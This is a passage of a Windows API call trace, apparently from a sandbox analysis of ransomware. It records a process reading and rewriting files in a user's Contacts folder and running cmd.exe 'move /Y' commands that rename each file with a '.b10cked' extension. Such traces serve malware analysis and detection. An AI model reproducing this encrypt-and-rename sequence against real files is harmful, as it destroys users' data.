lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4e9 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.246] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x273, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x273, lpOverlapped=0x0) returned 1 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.246] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x273, lpOverlapped=0x0) returned 1 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-627, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x276 [0219.246] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x273, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x273, lpOverlapped=0x0) returned 1 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-627, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x276 [0219.246] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x273, lpOverlapped=0x0) returned 1 [0219.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mneuc uhnfghgg.contact", 
cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0219.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mneuc uhnfghgg.contact", cchWideChar=22, lpMultiByteStr=0x13286a4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mneuc uhnfghgg.contact", lpUsedDefaultChar=0x0) returned 22 [0219.250] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4e9 [0219.250] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.250] CloseHandle (hObject=0x1b4) returned 1 [0219.251] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON") returned 0x26 [0219.251] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0219.251] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | 
out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf40, dwThreadId=0xe44)) returned 1 [0219.252] CloseHandle (hObject=0x120) returned 1 [0219.252] CloseHandle (hObject=0x1b4) returned 1 [0219.253] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.253] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.253] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0219.253] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.253] ReleaseMutex (hMutex=0xf8) returned 1 [0219.253] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.253] ReleaseMutex (hMutex=0xf8) returned 1 [0219.253] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.253] ReleaseMutex (hMutex=0xf8) returned 1 [0219.253] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.253] ReleaseMutex (hMutex=0xf8) returned 1 [0219.253] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27604241393) returned 1 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x9 [0219.254] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4f1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4f1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.256] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x277, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x277, lpOverlapped=0x0) returned 1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.256] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x277, lpOverlapped=0x0) returned 1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-631, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27a [0219.256] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x277, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x277, lpOverlapped=0x0) returned 1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-631, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27a [0219.256] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x277, lpOverlapped=0x0) returned 1 [0219.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ofhbnh edferrr.contact", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0219.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ofhbnh edferrr.contact", cchWideChar=22, lpMultiByteStr=0x13286a4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ofhbnh edferrr.contact", lpUsedDefaultChar=0x0) returned 22 [0219.260] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4f1 [0219.260] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.260] CloseHandle (hObject=0x1b4) returned 1 [0219.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON") returned 0x26 [0219.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0219.262] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"", 
lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x694, dwThreadId=0xd24)) returned 1 [0219.291] CloseHandle (hObject=0x120) returned 1 [0219.291] CloseHandle (hObject=0x1b4) returned 1 [0219.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.291] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0219.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.291] ReleaseMutex (hMutex=0xf8) returned 1 [0219.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.291] ReleaseMutex (hMutex=0xf8) returned 1 [0219.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.291] ReleaseMutex (hMutex=0xf8) returned 1 [0219.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.291] ReleaseMutex (hMutex=0xf8) returned 1 [0219.292] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: 
"c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.311] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.311] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.311] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.311] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27610067973) returned 1 [0219.311] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 